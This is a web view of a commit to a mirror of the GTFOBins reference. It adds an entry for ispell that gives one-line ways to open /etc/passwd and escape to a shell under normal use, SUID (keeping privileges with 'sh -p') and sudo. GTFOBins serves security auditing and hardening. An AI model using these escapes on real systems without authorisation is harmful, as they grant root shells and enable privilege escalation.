mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
parent
1ab481cbd0
commit
50ab4f0ce0
15
_gtfobins/ispell.md
Normal file
15
_gtfobins/ispell.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
ispell /etc/passwd
|
||||||
|
!/bin/sh
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
./ispell /etc/passwd
|
||||||
|
!/bin/sh -p
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo ispell /etc/passwd
|
||||||
|
!/bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user